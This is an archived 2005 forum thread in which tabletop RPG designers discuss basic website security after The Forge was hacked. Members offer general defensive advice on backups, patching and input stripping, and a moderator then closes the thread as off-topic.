The Forge Forums Read-only Archives
The live Forge Forums
|
Articles
|
Reviews
Welcome,
Guest
. Please
login
or
register
.
July 01, 2022, 09:57:49 AM
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
Forum changes:
Editing of posts has been turned off until further notice.
Search:
Advanced search
275647
Posts in
27717
Topics by
4285
Members Latest Member:
-
Jason DAngelo
Most online today:
83
- most online ever:
565
(October 17, 2020, 02:08:06 PM)
The Forge Archives
General Forge Forums
Site Discussion
Hacking websites/forums and how to protect yourself
Pages: [
1
]
« previous
next »
Author
Topic: Hacking websites/forums and how to protect yourself (Read 4279 times)
Space Cowboy
Member
Posts: 74
Hacking websites/forums and how to protect yourself
«
on:
March 14, 2005, 02:54:14 PM »
Hey all,
As
The Forge
was recently hacked. Personally, I barely know enough about computers to get by, and since
Wild Sphere
’s forums are under construction, I am understandably concerned that something equally malicious might happen to us in the future.
My questions are: Can folks point me in the direction of good, basic information about web hacking? (e.g., how do they work), what are the most common and most difficult to repair types of hacks?, and what can be done to protect against them?
Many thanks in advance!
Logged
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM)
: A Cinematic Space Western RPG
http://www.wildsphere.com
DevP
Member
Posts: 576
Hacking websites/forums and how to protect yourself
«
Reply #1 on:
March 14, 2005, 06:59:09 PM »
Well, I can tell you firstly, to make frequent backups (or figure some system for doing so). Once you got that, then even with hackings you'll be okay. You probably want a backup of the site, and frequent backups of the database that powers your forums and whateverelse you got. Beyond that, always getting the latest patches is key. Look for an RSS feed with news/updates for the software you're using.
Logged
Dev Purkayastha |
10by10room is a tumblelog
|
Come visit StoryGames Boston!
Rob Carriere
Member
Posts: 187
Hacking websites/forums and how to protect yourself
«
Reply #2 on:
March 15, 2005, 06:13:37 AM »
Space Cowboy,
There are basically four types of attack you have to deal with:
1- Attacks against the network protocol stack. These are low-level attacks, they have nothing to do with what sort website you offer, or even whether you offer a website. They are possible against any machine that is connected to the Internet.
The defenses are:
. Keep your operating system fully patched.
. Run your machines from behind a firewall.
. If possible, select your operating system with security in mind.
In your case, these are probably the worry of your hosting provider. If you are concerned, check their policies in this regard.
2- Attacks against the webserver. These are mid-level attacks, that depend only on the fact you are offering some sort of website.
The defenses are:
. Keep your webserver fully patched.
. Do not activate any webserver modules/plugins/whatevers that aren't actually needed for your website.
. If possible, select your webserver with security in mind.
Again, this would probably be up to your hosting provider. I took a quick look and it seems that your website is running Apache (good) and it is configured to not publish its configuration (better than 90-odd % of websites out there). Based on that, I suspect you may well have a security-conscious hosting provider. However, you should check to make sure.
3- Attacks against applications running on the website (such as a bulleting board, a wiki, a blog, or even something as silly as a visitor counter.) These are high-level attacks, that will obviously only work if your website is actually running the targetted application. (This is the reason for the defense under 2 above--if it ain't there, they can't hack it.)
The defenses are:
. Choose your applications wisely. Some programs are much more prone to security flaws than others and some programs are much better known than others. Obviously, the worst case is a well-known, poorly-programmed application. Sadly, phpBB comes close to qualifying. It usually has several security problems per year and it is probably the best-known bulletin board code, so these problems are invariably exploited and usually exploited quickly (under a week, in the case of the Forge).
. Keep your application fully patched.
. Be very, very careful with customization and configuration. Far more security problems originate in poor configuration than in poor applications (and, considering the quality of some apps, that's saying a lot!) If you don't understand the configuration, talk it through with, or defer it entirely to, somebody who does.
Between these three kinds of attack, there are many, many possible technical approaches. The good news is: you don't really care
how
they hack, you just care
what
they are hacking for. Again, there are a number of classes of goals, but in the wild we really only see three:
- Denial of service. The attack causes your site to be unreachable or otherwise useless. Two examples would be generating such massive amounts of fake traffic that you webserver can no longer handle the real traffic and causing a crash of your webserver.
- Destruction of information. What happened with the Forge: somebody wiped all the data. A more subtle approach would be to introduce errors in the data (fake posts, for example)
- Theft of information. A favorite with sites that record sensitive data such as credit card numbers.
Recovery from Denial of Service consists mostly of waiting it out. Sooner or later the attack stops and life continues.
Recovery from destruction of information depends on having backups. Backups on the webserver are good, because they allow rapid recovery, but not sufficient, because a good hacker will destroy them as well (as happened with the Forge). So have a strategy to feed backups to a secure location...frequently.
There really is no good recovery from Theft of Information, other than waiting through the (usually long) period until the people whose information was stolen stop being mad at you and start trusting you again. For this reason, many sites transfer sensitive information off the webserver to somewhere more secure ASAP. (That means: within seconds.)
4- The fourth kind of attack is not against your site at all, but against your site's visitors via your site. The usual trick with a bulletin board is that I post something that contains code. Anybody who views my post will be running my (hidden) code in their browser. If this code is designed to exploit one of the many open security problems with Internet Explorer, I can do whatever I want on the computers of all your visitors...
The defense is to strip incoming posts of anything that even looks like it might be dangerous--the bulletin board code should be doing this work for you.
The most common problems with bulletin board sites are all input stripping related. Either type 3 or type 4 attacks may be possible if the input stripping isn't good enough in each every place the software ever asks for input (which is
many
places!)
Was this the sort of info you were looking for?
SR
--
Logged
Ron Edwards
Global Moderator
Member
Posts: 16490
Hacking websites/forums and how to protect yourself
«
Reply #3 on:
March 15, 2005, 09:54:28 AM »
Hello,
Rob, thanks for being helpful, and I hope your contribution provides a good start.
I've decided, after deliberating for a while, that plenty of websites and other resources exist which can help developers guard against hacking. The Forge might do well to compile a list of such sources in the Publishing forum, but discussion about it isn't really on-topic here.
Best,
Ron
Logged
Space Cowboy
Member
Posts: 74
Hacking websites/forums and how to protect yourself
«
Reply #4 on:
March 15, 2005, 01:27:34 PM »
Hey guys,
Thanks heaps for your posts. Very informative for a neophtye like myself. I'll also pass it along to my web designer.
Many thanks!
Logged
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM)
: A Cinematic Space Western RPG
http://www.wildsphere.com
Space Cowboy
Member
Posts: 74
Hacking websites/forums and how to protect yourself
«
Reply #5 on:
March 15, 2005, 01:28:18 PM »
Quote from: Ron Edwards
I've decided, after deliberating for a while, that plenty of websites and other resources exist which can help developers guard against hacking. The Forge might do well to compile a list of such sources in the Publishing forum, but discussion about it isn't really on-topic here.
Best,
Ron
Hey Ron,
If you want to move this thread over there, that's cool.
Cheers
Logged
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM)
: A Cinematic Space Western RPG
http://www.wildsphere.com
Ron Edwards
Global Moderator
Member
Posts: 16490
Hacking websites/forums and how to protect yourself
«
Reply #6 on:
March 15, 2005, 01:37:23 PM »
When I need non-moderators' help in deciding what to do with a thread, I'll ask, thanks.
Some folks have already asked me about setting up a Publishing thread about this stuff, which I've approved.
This thread's now closed.
Best,
Ron
Logged
Pages: [
1
]
« previous
next »
Jump to:
Please select a destination:
-----------------------------
Welcome to the Archives
-----------------------------
=> Welcome to the Archives
-----------------------------
General Forge Forums
-----------------------------
=> First Thoughts
=> Playtesting
=> Endeavor
=> Actual Play
=> Publishing
=> Connections
=> Conventions
=> Site Discussion
-----------------------------
Archive
-----------------------------
=> RPG Theory
=> GNS Model Discussion
=> Indie Game Design
-----------------------------
Independent Game Forums
-----------------------------
=> Adept Press
=> Arkenstone Publishing
=> Beyond the Wire Productions
=> Black and Green Games
=> Bully Pulpit Games
=> Dark Omen Games
=> Dog Eared Designs
=> Eric J. Boyd Designs
=> Errant Knight Games
=> Galileo Games
=> glyphpress
=> Green Fairy Games
=> Half Meme Press
=> Incarnadine Press
=> lumpley games
=> Muse of Fire Games
=> ndp design
=> Night Sky Games
=> one.seven design
=> Robert Bohl Games
=> Stone Baby Games
=> These Are Our Games
=> Twisted Confessions
=> Universalis
=> Wild Hunt Studios
-----------------------------
Inactive Forums
-----------------------------
=> My Life With Master Playtest
=> Adamant Entertainment
=> Bob Goat Press
=> Burning Wheel
=> Cartoon Action Hour
=> Chimera Creative
=> CRN Games
=> Destroy All Games
=> Evilhat Productions
=> HeroQuest
=> Key 20 Publishing
=> Memento-Mori Theatricks
=> Mystic Ages Online
=> Orbit
=> Scattershot
=> Seraphim Guard
=> Wicked Press
=> Review Discussion
=> XIG Games
=> SimplePhrase Press
=> The Riddle of Steel
=> Random Order Creations
=> Forge Birthday Forum